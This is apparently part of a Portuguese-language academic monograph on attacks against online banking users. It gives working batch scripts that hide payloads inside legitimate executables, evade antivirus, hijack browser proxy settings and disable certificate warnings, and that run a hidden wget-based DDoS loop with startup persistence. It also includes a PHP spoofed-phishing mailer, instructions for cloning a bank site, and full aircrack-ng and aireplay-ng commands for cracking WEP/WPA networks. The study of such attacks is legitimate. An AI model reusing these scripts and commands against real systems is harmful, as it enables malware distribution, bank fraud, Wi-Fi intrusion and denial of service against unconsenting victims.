distribuição via e-mail com maior facilidade (basta colocar em uma pasta compactada), se
comparados a programas comuns.
A partir de um arquivo de batch é possível executar diversos programas, processar
48
cls
set /p seg=Tempo para o Desligamento (em segundos):
set /p msg=Digite uma mensagem de desligamento:
set /p force=Forcar desligamento (s/n):
if %force%==s set f=-f
if not %force%==s set f=
shutdown -s -t %seg% -c "%msg%" %f%
goto cancelar
:reiniciar
cls
set /p prog=Reiniciar com os programas atuais (somente para windows 7)(s/n):
if %prog%==s set r=-g
if not %prog%==s set r=-r
set /p seg=Tempo para o reinicio (em segundos):
set /p msg=Digite uma mensagem:
set /p force=Forcar reinicio (s/n):
if %force%==s set f=-f
if not %force%==s set f=
shutdown %r% -t %seg% -c "%msg%" %f%
:cancelar
cls
echo 1.Cancelar tarefa atual
echo 2.Voltar para a tela principal
echo 3.Sair do programa
set /p opcao=Escolha uma tarefa (1,2 ou 3):
if %opcao%==1 shutdown -a
if %opcao%==2 goto Inicio
if %opcao%==3 exit
goto cancelar
50
Uma das maiores desvantagens de utilizar um simples batch para disseminar vírus de
computadores, ou induzir algum usuário a executar atividades que ele não deseja, é o fato de o
arquivo poder ser aberto em qualquer editor de texto e ter seu código visualizado e estudado
por completo. Uma forma de corrigir este problema é transformar o arquivo de processamento
em lotes em um executável do tipo “.exe”. Com a finalidade de exemplificar o processo, serão
discutidas as funcionalidades do programa “Bat To Exe Converter v1.5”.
Após o arquivo de processamento em lotes ser criado, resta apenas carregá-lo com o “Bat
To Exe Converter”, escolher o diretório onde o novo arquivo executável será salvo e clicar em
“Compile” para criar um arquivo não visualizável em qualquer editor de texto.
51
Diversos aplicativos, como o “Senna Spy EXE Maker 2001” e o “Cactus Joiner“, podem
ser utilizados para anexar um vírus a outro arquivo qualquer – como uma foto ou vídeo – e
executar o vírus de forma invisível para o usuário. O “Cactus Joiner“, por exemplo, oferece
até mesmo permissões para abrir portas no firewall de forma automática.
O sistema operacional Windows também possui um programa nativo que é capaz de
52
realizar a tarefa. Apesar de pouco utilizado e conhecido, o aplicativo pode ser executado em
versões mais recentes do Windows com o comando “iexpress”. O “Winrar”, programa
amplamente conhecido e normalmente utilizado para compactar ou descompactar arquivos,
também possui opções pouco utilizadas ou conhecidas que permitem anexar um vírus a um
arquivo qualquer e executá-lo de forma invisível.
No exemplo subsequente, será exemplificada uma forma de criar um aplicativo que o
qual, ao mesmo tempo em que executa um programa legítimo criado por outrem, de forma
transparente, executa um programa malicioso (Malware) que insere uma foto de uma caveira
como papel de parede da área de trabalho do Windows de uma maneira que não é possível
removê-la a menos que o registro do Windows seja editado. Para esta tarefa, também pode ser
utilizado o programa “Bat To Exe Converter” com a escolha de algumas opções
personalizadas.
Neste exemplo, será adicionado o programa “instalar papel de parede.bat” e a imagem
“caveira.jpg” (que ficará como o papel de parede) ao editor de textos “Atlantis.exe”.
O conteúdo do arquivo de execução em lotes é o seguinte:
@echo off rem Criado para fins acadêmicos por Pedro Ramos
@mkdir %homepath%\Windows
@move /y caveira.jpg %homepath%\Windows\System.jpg
@attrib +R +S +H %homepath%\Windows\System.jpg
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v Wallpaper
/t REG_SZ /d "%homepath%\Windows\System.jpg" /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v
WallpaperStyle /t REG_SZ /d 2 /f
@start Atlantis.exe
Há sete linhas de comando no arquivo (cada linha de comando começa com”@”) que são
suficientes para, de forma transparente, criar um diretório chamado “Windows” na pasta do
usuário que executar o programa, inserir o arquivo de imagem que servirá de plano de fundo
na área de trabalho (renomeado para “System.jpg”) dentro do novo diretório, ocultar e
proteger o novo arquivo, inserir alterações no registro para definir o papel de parede
impedindo ele seja alterado e, por último, executar o aplicativo original (Atlantis.exe).
53
Diversas outras opções são disponibilizadas pelo aplicativo e podem ser utilizadas de
acordo com a função do novo programa desenvolvido. A opção “Encrypt the program”, por
exemplo, pode ser útil quando a intenção é camuflar um vírus já conhecido e evitar que ele
seja detectado pelo programa antivírus. A inclusão de quaisquer arquivos como programas,
imagens e vídeos pode ser feita ao clicar na aba “Include”.
54
Da mesma forma que a imagem da caveira foi anexada, um vírus ou um programa que
registra as imagens da tela e as teclas digitadas pelo usuário (image keylogger) também pode
ser adicionado, possibilitando a captura de senhas de contas bancárias digitadas em teclados
virtuais, por exemplo.
Caso seja necessário deixar o novo programa com a aparência bem parecida à do original,
a aba “Versioninformations” oferece algumas opções.
É possível verificar que o arquivo gerado pelo programa é pouco maior que o original,
pois contém uma foto e um arquivo de batch. O ícone utilizado também é pouco diferente,
porém, nada impede que um ícone idêntico seja utilizado.
Conforme visto nos capítulos anteriores, o código acima pode ser digitado em um editor
de texto qualquer e, após ser salvo com a extensão “.bat”, pode ser compilado para executar
de forma invisível e anexado a outro arquivo íntegro. Após sua execução, toda vez que o
usuário tentar acessar o site de buscas “www.google.com.br” ou “www.google.com”, será
direcionado para o site de buscas do “Yahoo” do Reino Unido e Irlanda do Norte, cujo
endereço atual é “74.6.239.84”. A figura abaixo foi originada de um ataque experimental real.
É importante ressaltar que mesmo durante o acesso ao site “Yahoo”, a barra de endereços
ainda continua a mostrar o endereço que o usuário desejava acessar. Da mesma forma que foi
possível direcionar para o “Yahoo”, um usuário que tentava acessar o “Google”, um código
semelhante ao que foi apresentado há pouco pode ser utilizado para direcionar um usuário que
queira acessar sua conta bancária ao computador de um cracker ou servidor por ele
manipulado. Caso um usuário seja direcionado para um site falso de uma instituição
financeira e o site for bem feito, dificilmente a pessoa a ser enganada desconfiará de uma
fraude. Caso o usuário que executar o arquivo malicioso tenha permissões de administrador
do sistema, dificilmente o direcionamento dos endereços não obterá êxito ou será bloqueado
por um firewall ou antivírus.
A invasão de contas bancárias talvez seja um dos golpes mais temidos por quem faz uso
da tecnologia para movimentações financeiras pela internet. Só no Brasil, estima-se que cerca
de 32,5 milhões de pessoas utilizam a internet para realizar transações bancárias (VALLE,
2010). Um ataque que atinja apenas um por cento deste público, afetará mais de 300 mil
pessoas. Mesmo que seja um ataque mal elaborado e de fácil percepção por parte do usuário
do sistema, caso consiga enganar apenas 0,01 por cento das pessoas afetadas pelo ataque,
mais de trinta usuários da internet poderão ter seu dinheiro roubado.
Uma grande variedade de técnicas é utilizada para cometer crimes digitais que envolvem
instituições financeiras. Algumas delas já são bem conhecidas, por grande parte das empresas
e usuários da internet, o que leva à conclusão de que, para um criminoso realizar um ataque
com sucesso, a combinação de técnicas é o modo mais eficiente.
Mesmo com grande investimento em segurança de informação feito por parte das
instituições financeiras, dificilmente é possível debelar crackers tenazes, o que leva a crer que
o investimento em conscientização dos usuários é uma boa medida de segurança.
4.3.1 Pharming
Um site falso é, atualmente, uma das ferramentas mais utilizadas por criminosos da
área de informática para enganar usuários da internet que acessam sites de instituições
financeiras. Uma das razões para a crescente prática desse tipo de crime é a facilidade com
58
que um site original pode ser copiado e a grande quantidade de usuários que são facilmente
induzidos a acessá-los. Dependendo da forma como foi desenvolvido e de sua complexidade,
muitas vezes é possível copiá-lo de forma integral, o que dificulta a percepção de que o site é
falso. Até mesmo sites mais complexos, como sites de instituições financeiras e comércios
eletrônicos, são passíveis de cópia. Qualquer usuário da internet que utilize um navegador
comum como o “Internet Explorer” pode tentar. Para exemplificar como isso pode ser feito,
foi copiado o site de uma instituição financeira.
No navegador “Internet Explorer” foi digitado o seguinte endereço: “www.bb.com.br”.
No menu “arquivos”, escolheu-se a opção “Salvar como...”
Após a escolha da opção “Salvar como...”, uma nova janela foi aberta com uma
mensagem dizendo que a página não poderia ser completamente salva e perguntando:
“Gostaria de salvar a página mesmo assim?”. Após clicar em “Sim” para a resposta à
pergunta, uma nova janela conforme a figura a seguir foi aberta.
59
Até mesmo as fotos que estavam no site foram copiadas, como é possível verificar na
imagem a seguir.
Nem todos os arquivos podem ser baixados desta maneira e a perfeição de um site falso
dependerá inteiramente da habilidade que o cracker tem em desenvolver sites, além de sua
criatividade para modificar os itens que ele não consegue copiar com perfeição. Na imagem
60
do site falso, é possível verificar que os botões de menu que ficam logo abaixo dos locais
onde são inseridos os dados de agência e conta ficaram defeituosos. Muitos usuários não
suspeitariam que o site é falso somente por este motivo. Ainda assim, um cracker com
conhecimentos básicos de desenvolvimento de sites poderia facilmente consertar o problema.
As telas seguintes, que servem para a autenticação de um usuário em sua conta corrente,
também podem ser falsificadas por um bom desenvolvedor de sites (Web Disigner), inclusive
os teclados virtuais. É pertinente ressaltar, também, que um cracker não precisa desenvolver
um site por completo, pois é possível utilizar informações do site oficial e repassá-las para o
usuário em tempo real, conforme abordado em capítulos posteriores.
Após copiar e modificar o site para ter sua aparência mais parecida possível com o site
original, o cracker pode armazená-lo em um computador qualquer ou hospedá-lo em sites no
exterior. Algumas vezes são utilizadas contas falsas em sites gratuitos de hospedagem de sites,
a fim de aumentar a anonimidade do criminoso.
Um site falso, exposto ao público da internet, rapidamente pode ser detectado e tirado do
ar (principalmente se for um site falso de uma grande instituição). Para evitar que o site seja
retirado do ar, um cracker pode utilizar diversos meios como, por exemplo, permitir que
somente endereços específicos (de clientes do banco) consigam acessar o site ou, em outros
casos, impedir somente que robôs dos sites de busca indexem o conteúdo do site. Para
impedir que os robôs dos sites de busca acessem o site, pode ser adicionada uma linha dentro
da página que contém o código fonte do site. O conteúdo abaixo é um exemplo do que pode
ser adicionado nas páginas com código fonte do site.
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
Caso o cracker tenha a intenção de não ter seu site indexado pelos sites de busca, também
é possível criar um arquivo chamado “robots.txt” com o conteúdo abaixo e colocá-lo no
diretório-raiz do site.
Conteúdo do arquivo “robots.txt”:
User-agent: *
Disallow: /
Após a criação e hospedagem do site falso, o criminoso pode utilizar, entre outras
técnicas, a engenharia social para convencer o usuário a clicar em um link falso que remeta ao
site fake ou o DNS spoofing (abordado em capítulos anteriores) para que o cliente da
instituição financeira seja automaticamente direcionado ao site falso.
61
Anonymail. Figura 33
62
Boa parte dos melhores sites que enviam e-mails anônimos ou com endereços forjados
ficam pouco tempo no ar e, quando não passam a cobrar pelos serviços, passam a enviar e-
mails com marcas d’água (que indica que o e-mail não é verdadeiro ou é anônimo).
Programas que fazem este serviço também podem ser baixados, porém, muitos deles
simplesmente param de funcionar depois de um tempo ou precisam ser comprados, além do
fato de muitas vezes serem distribuídos juntamente com vírus de computador.
Um cracker também pode, mesmo possuindo conhecimentos superficiais em
programação, desenvolver seu próprio software para envio de e-mails com endereço forjado,
utilizando apenas poucas linhas de código. Em “PHP” (acrônimo de “PHP: Hypertext
Preprocessor”), por exemplo, o seguinte código pode ser utilizado para enviar um e-mail com
o remetente alterado, apenas substituindo os termos em itálico. O código pode não funcionar
corretamente caso algum item que não esteja em itálico seja substituído.
<?php
mail("
vitima1@hotmail.com; vitima2@yahoo.com.br
","Assunto confidencial ","
Você acaba de ser premiado e tem 2 dias para receber o prêmio. Clique aqui para recebê-lo
","FROM:mamãe noel<papainoel-e-silviosantos@yahoo.com.br>");
echo "Sua mensagem foi enviada com sucesso!";
?>
Para enviar mais de um e-mail ao mesmo tempo, é preciso separá-los por um ponto e
vírgula e um espaço simples. A fim de fazer uso do código acima, o cracker pode realizar um
cadastro com dados falsos em algum serviço de hospedagem que suporte a linguagem “PHP”
e, além de enviar e-mails com o remetente falso, pode realizar a prática de spam. Os links
enviados no corpo do e-mail, também podem ser facilmente forjados, como no exemplo:
<a href="www.site-do-cracker.org"> www.show-do-milhão.com.br </a>
No modelo acima, quando o usuário clica em “www.show-do-milhão.com.br”, é
direcionado ao site “www.site-do-cracker.org”.
Sob a ótica das fraudes de cunho financeiro, a característica de um phishing scam é um
e-mail que possui um conteúdo desenvolvido especialmente para coletar informações
sigilosas (como senhas) para um posterior logro. O phishing scam que visa a obtenção de
vantagens financeiras, frequentemente contém, além de endereços de e-mail e links forjados,
imagens reais da instituição e mensagens de cumprimento que fazem o destinatário pensar
63
que o e-mail é autêntico. Muitas vezes, são apenas e-mails que despertam a curiosidade do
leitor (FILHO, 2008, p.1). Alguns destes e-mails, ao terem seus links clicados, instalam
programas maliciosos, como programas capazes de capturar autenticação bancárias (mesmo
as que utilizam teclado virtual e token). Alguns programas deste tipo (keyloggers) são
executados de forma invisível ao usuário, firewall e o antivírus e são capazes de enviar ao
cracker, por e-mail, toda a atividade realizada no computador, como teclas digitadas e
imagens das telas. Um poderoso keylogger pode ser facilmente adquirido e, muitos deles
(como o “Ardamax”) não exigem conhecimentos avançados em informática (não precisa ser
um cracker) para utilizá-lo. A instalação de um programa para fim malicioso também pode
vir, até mesmo, sob o pretexto de atualizações de segurança.
Outra forma de conseguir informações sigilosas através de um phishing scam que pode
ser eficiente, porém, é ainda mais baseado na ingenuidade do destinatário, é enviar uma
mensagem eletrônica que diz ser necessário realizar alguma atualização cadastral e solicita
dados sigilosos.
avançados ou com funções semelhantes – como o “Paros Proxy” – também podem ser
utilizados, porém, o “Achilles” é uma boa ferramenta para que pessoas que não possuem
conhecimentos técnicos em redes de computadores possam entender o funcionamento da
técnica.
Antes de realizar um ataque Man In The Middle é necessário configurar algumas
opções no programa “Achilles”.
Achilles. Figura 34
aparecerá uma janela de alerta ao usuário, dizendo que há um problema com o certificado, não
atrapalhando no funcionamento do programa (ver figura 40).
- Foi clicado no botão com a letra “C” para abrir a janela “Cliente Data Window”, que será a
janela onde aparecerão os dados interceptados.
Configurações terminadas, o botão com o desenho de um triângulo (play) foi acionado
para colocar o servidor em funcionamento.
No computador do usuário, para que o tráfego seja direcionado à máquina onde o
servidor está sendo executado, as configurações de proxy da vítima deve ser alterada. As
configurações podem ser realizadas na grande maioria dos navegadores atuais e, geralmente,
são de fácil entendimento No navegador “Internet Explorer”, por exemplo, o caminho é o
seguinte: “Ferramentas”, “Opções da Internet”, “Conexões” e, ao clicar em “Configurações da
LAN”, é exibida a seguinte tela.
@echo off rem Criado para fins acadêmicos por Pedro Ramos
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
MigrateProxy /t Reg_DWord /d 1 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
ProxyEnable /t Reg_DWord /d 1 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
ProxyHttp1.1 /t Reg_DWord /d 0 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
ProxyServer /t REG_SZ /d 192.168.2.70:443 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
WarnonBadCertRecving /t Reg_DWord /d 0 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
WarnOnPostRedirect /t Reg_DWord /d 0 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
WarnOnZoneCrossing /t Reg_DWord /d 0 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
PrivDiscUiShown /t Reg_DWord /d 1 /f
@reg add "HKCU\Software\Microsoft\Windows\Internet Explorer\IntelliForms" /v AskUser /t
Reg_DWord /d 0 /f
@reg add "HKCU\Software\Microsoft\Windows\Internet Explorer\InformationBar" /v
FirstTime /t Reg_DWord /d 0 /f
Todos os comandos começam com “@” e devem ser digitados, cada um, em uma
única linha. Caso seja executado um batch com estes comandos, além de alterar o registro do
67
Windows para que o proxy seja configurado de forma automática, algumas opções de
segurança também são alteradas para que o ataque seja concretizado com maior facilidade.
Apenas o comando que contém o servidor e a porta (192.168.2.70:443) devem ser alterados
para o servidor e porta correspondentes ao servidor proxy do atacante. Como visto
anteriormente, também pode ser criado e enviado por e-mail um programa que execute
comandos de forma invisível.
Depois de realizadas as configurações do cliente e servidor, em um site de busca na
internet, de forma aleatória, foram escolhidos os dados de agência e conta corrente de um
cliente de um banco, somente para utilizar como exemplo neste trabalho e obter acesso até a
parte que exibe o teclado virtual.
Após escolher aleatoriamente o número de uma agência e conta corrente, foi acessado
o site da instituição financeira em questão e, com o “Achilles” capturando os dados, foi feita
uma tentativa de acesso. Foram digitados os dados de agência e conta corrente e, assim que o
botão “OK” foi selecionado, os dados foram capturados pelo aplicativo.
68
número qualquer (888888). Como esperado, o sistema não aceitou o código digitado e não foi
possível o acesso, porém, se a senha estivesse correta, seria capturada pelo aplicativo.
Como é possível verificar, o fato de aparecer cadeados de segurança e “https” na barra
de endereços, não representa garantia totalmente eficaz de que os dados não estão sendo
interceptados.
Não foram realizados testes de captura de dados de tabela de senhas ou tokens. Porém,
mesmo com protocolos de criptografia sendo utilizados, como visto anteriormente, os dados
provenientes do cliente podem ser capturados em formato de texto simples, posto que, quem
realmente estabelece a comunicação com o site da instituição financeira é a máquina que
executa o servidor proxy. Além disso, também é importante salientar que um cracker pode
utilizar várias técnicas em conjunto com a finalidade de realizar um ataque bem sucedido.
Para interagir em tempo real com os dados interceptados pelo “Achilles”, alterando,
excluindo ou inserindo novos dados, as opções “Intercept Client Data” e/ou “Intercept Server
70
Data” devem ser selecionadas. Para modificar os dados da conexão em um ataque deste tipo,
deve-se levar em conta que os dados provenientes da instituição financeira serão interceptados
de forma criptografada e dificilmente poderão ser feitas alterações de uma forma consciente.
Um dos maiores obstáculos que um cracker pode encontrar para realizar um ataque
deste tipo, é, talvez, o certificado de segurança. Neste ataque, caso seja utilizado um
certificado inválido, um alerta semelhante ao da imagem a seguir será exibido ao usuário.
Boa parte dos dispositivos de rede sem fio utilizados atualmente suporta uma forma de
operação conhecida como “RFMON” (acrônimo de Radio Frequency Monitor) chamado
também de “modo monitor” ou ainda, “modo promíscuo”. Esta forma de operação permite
que um computador que possui uma interface Wireless possa capturar, de forma passiva, todo
o tráfego oriundo de redes sem fio que trafegam pelo meio (o ar). Alguns dispositivos
72
permitem também a interação com outros dispositivos de rede, como a possibilidade de enviar
pacotes e realizar autenticações falsas.
Diversas ferramentas, para diferentes sistemas operacionais e disponibilizadas de
forma gratuita na internet, são capazes de controlar uma interface de rede sem fio para que ela
possa operar em modo passivo. No exemplo a seguir, serão utilizadas as ferramentas
“Airmon-ng” e “Airodump-ng”.
No console de comando do “BackTrack”, o comando “airmon-ng” pode ser digitado
para visualizar os dispositivos de rede sem fio conectados e os nomes das interfaces.
Interfaces. Figura 41
Após a ativação do modo monitor, para verificar as informações das redes mais
próximas, pode ser digitado o comando “airodump-ng interface”.
Airodump-ng. Figura 43
Na figura 43 é possível verificar que o dispositivo de rede sem fio, de forma passiva,
monitora o tráfego da rede de três pontos de acesso em diferentes canais e exibe informações
referentes ao tráfego, tipo de segurança utilizada e seus respectivos endereços físicos.
A partir das informações verificadas com o comando anterior, o atacante pode escolher
uma ou mais redes e capturar informações de redes específicas adicionando os seguintes
parâmetros (sem as aspas):
-Escolha de canal “-c”.
-Salvar dados capturados “-w”.
-Escolha de ponto de acesso “--bssid” ou “--essid”.
O “airodump-ng” oferece diversas outras opções de monitoramento ou captura além
74
das citadas, porém, apenas para capturar e armazenar os dados trafegados em uma rede
específica, as mencionadas já são suficientes.
Para capturar somente o tráfego da rede “Elza e Ale” e salvá-lo em um arquivo de
texto, por exemplo, foi digitado o comando “airodump-ng –w dados –bssid
00:22:b0:46:10:89 –c 6 wlan0”
capturar cerca de 5000 pacotes, o que é possível em alguns segundos com o uso de
ferramentas para aumentar o tráfego da rede, já há a possibilidade de descobrir a senha de
uma rede sem fio. (FILHO, 2009).
De posse dos pacotes da rede sem fio que foram capturados, é necessário apenas um
comando para que a senha de uma rede que utiliza o protocolo WEP seja quebrada. O
comando “aircrack-ng -z -b mac-do-ap dados-capturados” utiliza o ataque chamado PTW
(iniciais dos nomes dos criadores, Andrei Pychkine Erik Tews e Ralf-Philipp Weinmann) e é
capaz de descobrir uma senha em questão de segundos. Após a captura de 25970 vetores de
inicialização, para quebrar a senha da rede que serve de exemplo para este trabalho, o seguinte
comando foi digitado:
aircrack-ng -z -b 00:22:b0:46:10:89 dados*.cap
Caso um ponto de acesso não seja muito utilizado, pouco tráfego será gerado e poucos
pacotes poderão ser capturados. A rede que foi utilizada para elaborar esta monografia, por
exemplo, não possuía nenhum cliente conectado. Sem a utilização de outras técnicas, o
processo de captura seria extremamente duradouro ou não seria possível quebrar a senha. Para
solucionar este problema, foi criado um tráfego entre o próprio dispositivo atacante e o ponto
de acesso. A fim de obter maiores chances de sucesso no processo de injeção de pacotes, uma
autenticação falsa foi criada com o comando:
Aireplay-ng -1 30 –e “Elza e Ale” –a 00:22:b0:46:10:89 –h 00:15:af:04:4c:8f wlan0
“Elza e Ale”, corresponde ao nome do ponto de acesso, “00:22:b0:46:10:89”, o
endereço físico e “00:15:af:04:4c:8f” é o endereço do dispositivo que se conectou ao roteador.
Caso seja necessário manter o anonimato sobre o endereço físico do dispositivo sem
fio que fará a conexão falsa e a injeção de pacotes, o seguinte comando pode ser digitado
antes da autenticação para alterá-lo:
“macchenger –mac endereço_novo interface”
O aplicativo “aireplay-ng” possui diversas opções de ataque que podem ser utilizadas
de acordo com cada situação em específico. Uma forma de ataque que funciona em boa parte
dos casos e é de extrema eficiência, é injetar pacotes forjados pelo programa “packetforge-
ng”. Antes de criar um pacote forjado, é necessário realizar um procedimento para criar uma
série de combinações randômicas de caracteres para produzir uma chave criptografada válida
(uma keystream). Com o próprio “aireplay-ng”, é possível criar uma keystream válida, ao
digitar os seguintes parâmetros com a autenticação falsa ainda ativa:
“aireplay-ng -5 -b mac_do_ap -h mac_do_atacante interface”
Após a substituição dos termos em itálico, o comando ficou da seguinte forma:
aireplay-ng -5 -b 00:22:b0:46:10:89 -h 00:1f:1f:10:bb:5a wlan0
Assim que os parâmetros acima são digitados, é gerado um arquivo com a extensão
“.xor”. O arquivo criado para o exemplo ficou com o nome “fragment-1114-21538.xor” e
posteriormente foi utilizado para criar um pacote forjado a partir da sintaxe “packetforge-ng -
0 -a mac_do_ap -h mac_do_atacante -k 255.255.255.255 -L 255.255.255.255 -y arquivo(xor)
-w pacote”. No exemplo real, os seguintes parâmetros foram digitados:
packetforge-ng -0 –a 00:22:b0:46:10:89 –h 00:1f:1f:10:bb:5a –k 255.255.255.255 –L
255.255.255.255 –y *.xor –w pacote
É pertinente ressaltar que, antes de realizar a injeção de pacotes, caso o atacante queira
aumentar sua anonimidade, é necessário fazer a troca do endereço físico do dispositivo de
rede que enviará os pacotes.
WPA foi totalmente reformulado e não possui muita semelhança com o WEP, porém, o
WPA2, não é muito diferente de seu antecessor WPA. Salvo algumas diferenças como o
algoritmo de criptografia mais robusto que foi implementado no WPA2, o funcionamento dos
dois é extremamente parecido.
Para um indivíduo que deseja descobrir a senha de determinada rede sem fio protegida
pelo protocolo de segurança WPA ou WPA2, e não pretende utilizar a engenharia social ou
técnica correlata para obtê-la, as mesmas ferramentas utilizadas na quebra de senhas que
utilizam o protocolo WEP podem ser utilizadas. Assim como no procedimento realizado para
o WEP, o primeiro passo para realizar um ataque inteiramente técnico é iniciar a monitoração
e captura dos pacotes da rede em questão.
A partir do princípio de que, diferentemente do WEP, as senhas de redes sem fio que
são protegidas pelo protocolo WAP ou WPA2 não são iguais à da criptografia dos dados, é
possível concluir que, caso a intenção do atacante seja apenas a obtenção da senha, somente
os dados que são transmitidos durante o momento da autenticação são interessantes (o
handshake).
Para capturar o handshake, basta fazer a captura dos dados com o “airodump-ng”;
assim que ele for detectado, aparecerá uma mensagem no canto superior direito da tela de
monitoramento. Após esse momento, o processo de captura pode ser interrompido e então
poderá ser iniciado o processo de descoberta de senha a partir do hash obtido.
Caso a rede possua poucos clientes e não haja pedidos de novas conexões, a fim de
acelerar o processo de captura do handshake, é possível desconectar algum cliente para que
ele conecte-se novamente e os dados de conexão sejam capturados.
Neste exemplo, foi verificado que o cliente cujo endereço físico era
“00:15:af:04:4c:8f” estava conectado ao ponto de acesso. O seguinte comando foi digitado
para desconectá-lo:
Aireplay-ng -0 2 -a 08:10:74:3e:a9:36 -c 00:15:af:04:4c:8f wlan0
A descoberta da senha, neste caso, só foi possível devido ao fato de a mesma palavra
utilizada como senha para a rede existir na lista de palavras utilizada pelo “aircrack-ng”. De
forma avessa ao protocolo WEP, uma rede que utiliza o padrão WPA/WPA2 e possui uma
senha que seja formada por uma combinação maior que 10 caracteres, símbolos especiais e
números, pode exigir dias ou até anos para ter sua combinação secreta descoberta.
Para o exemplo apresentado neste trabalho, foi utilizada uma lista de palavras com
aproximadamente quinze gigabytes e que foi criada por uma combinação de programas para
extrair palavras de documentos, excluir as repetidas e adicionar caracteres ou combinar
palavras.
No caso da inexistência de uma lista de palavras ou a impossibilidade da criação de
uma, é possível utilizar o ataque de força bruta com a combinação dos programas “aircrack-
ng” e o “crunch” em um único comando, porém, caso a senha seja relativamente bem
elaborada, o processo pode tornar-se extremamente demorado. Contudo, caso a senha seja
parcialmente conhecida, o processo pode ser ainda mais rápido que a utilização de listas de
palavras. No caso da rede analisada nesta monografia, o comando poderia ser formado pelos
parâmetros a seguir:
/pentest/passwords/crunch/./crunch 10 10 -f charset.lst mixalpha-numeric -t
@erginho@@ | aircrack-ng *.cap -b 08:10:74:3e:a9:36 -w –
A utilização do comando acima resultaria na tentativa de descoberta de uma senha de
dez caracteres, cuja parte conhecida da senha é “erginho”. O aplicativo substituirá os
caracteres “@” de “@erginho@@” por letras e números até encontrar a senha correta. Caso
seja necessária a descoberta de uma senha de forma rápida e a partir de um computador
comum, programas que utilizam o poder de processamento das placas gráficas mostram-se
extremamente eficientes e podem diminuir substancialmente o tempo necessário para fazer os
cálculos de hash e encontrar um que seja idêntico ao que foi gerado pela senha original. O
aplicativo “Elcomsoft Wireless Security Auditor” é um bom exemplo de programa que
também utiliza o processador (GPU) de placas para aceleração gráfica, conhecidas por ter
bom desempenho em cálculos que envolvem operações com vírgulas flutuantes (floating
point), assim como os cálculos de hash.
83
Neste tópico, são abordas algumas técnicas que crackers utilizam para realizar ataques
nos quais o real atacante é ocultado, além de técnicas que utilizam diversos computadores
para um único propósito. Estes tipos de ataques, além de prejudicar a vítima principal,
também podem prejudicar outras pessoas e frequentemente são utilizados para práticas que
exigem anonimato ou grande difusão de dados. Para a disseminação de um vírus, por
exemplo, um atacante pode inicialmente utilizar um computador que está com a segurança
fragilizada e pode ser facilmente manipulado, prejudicando assim, não só as vítimas que
fazem parte do alvo principal do atacante, como também, pode afetar o funcionamento do
computador que foi utilizado para o ataque inicial, como o computador de um laranja.
Segundo o Núcleo de Informação e Coordenação do Ponto BR, ao contrário do que muitos
pensam, um computador não precisa ser necessariamente invadido para que passe a realizar
ações não comandadas pelo utilizador principal da máquina. Basta que um programa,
conhecido popularmente como programa “zumbi”, se instale em um computador para que o
mesmo passe a ser um computador “zumbi”. A partir de um computador “zumbi”, é possível
realizar ataques de negação de serviço (Denial Of Service ou DoS), esquemas de fraude e
envio de mensagens indesejadas (NIC BR, 2005).
@echo off rem Criado para fins acadêmicos por Pedro Ramos
if %date%==29/01/2011 goto acessar o site
goto fim rem Não fazer nada caso não seja o dia.
:acessar o site
@wget http://www.vitma.com.br --force-directories
@rd /q/s www.vitma.com.br
goto acessar o site
:fim
O código acima pode ser compilado com o “Bat To Exe Converter” para que seja
executado de forma oculta. O arquivo “wget.exe” deve ser anexado no momento da
compilação do programa. Para que ele seja executado de forma automática toda vez que o
Windows for iniciado, os comandos a seguir podem ser executados.
@echo off rem Criado para fins acadêmicos por Pedro Ramos
@mkdir %homepath%\sistema
@move /y ddos.exe %homepath%\sistema\ddos.exe
@attrib +R +S +H %homepath%\sistema\ddos.exe
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v windows /t REG_SZ
/d %homepath%\sistema\ddos.exe /f
@reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v windows /t
REG_SZ /d %homepath%\sistema\ddos.exe /f
em e-mails ou outra forma de propagação. Este tipo de ataque dificilmente será bloqueado por
um firewall, visto que é baseado no download ininterrupto dos arquivos da página inicial de
um site, local que, teoricamente, não deve ter o acesso bloqueado. Um ataque deste tipo, além
de possivelmente deixar o site alvo fora do ar, deixará todos os computadores infectados com
a conexão extremamente lenta, pois, ficarão realizando downloads até que o aplicativo seja
finalizado (caso o usuário possua conhecimentos em informática) ou o computador seja
desligado. Além de ter a performance da conexão prejudicada, o computador infectado
também corre o risco de ter a conexão bloqueada por alguns sites.
Caso um cracker consiga realizar uma invasão em algum computador que possui
conexão com a internet, será possível promover os mais variados tipos de ataques a partir da
máquina desprotegida, porém, ainda há vários outros tipos de ataques que podem ser
realizados a partir de um computador sem invadi-lo.
Uma prática bastante realizada a partir de computadores “zumbis” é a prática de spam
(NIC BR, 2005). A simples execução de um programa ou um clique feito de forma distraída já
é o suficiente para instalar um programa cuja função é enviar mensagens eletrônicas não
solicitadas para milhares ou milhões de endereços de e-mail. Caso a infecção ocorra, o
computador infectado, também neste caso, sofrerá queda de desempenho.
A queda de desempenho computacional de um sistema não é a única consequência
sofrida ou sintoma de um computador “zumbi”. Outra possível ameaça que um computador
sofre é ter um servidor proxy instalado de forma imperceptível.
Um servidor proxy, da mesma forma que pode ser utilizado por alguém que queira
interceptar dados advindos de conexões de outrem, também pode ser utilizado para fazer
somente o redirecionamento de uma conexão. Um cracker que visa a invasão de uma conta
corrente de um banco, por exemplo, pode instalar servidores que são executados de forma
invisível em alguns computadores, utilizar um dispositivo de rede sem fio com o endereço
físico alterado para se conectar em uma rede Wi-Fi alheia, e criar uma rota totalmente
diferente, passando por diversos computadores até chegar ao da vítima, a fim de manter-se
anônimo. Em uma ação desse tipo, os investigadores precisarão fazer a rota contrária à da
conexão com o computador da vítima e, as pessoas que tiveram o computador infectado por
malwares, possivelmente tornar-se-ão suspeitas.
86
5 Considerações finais
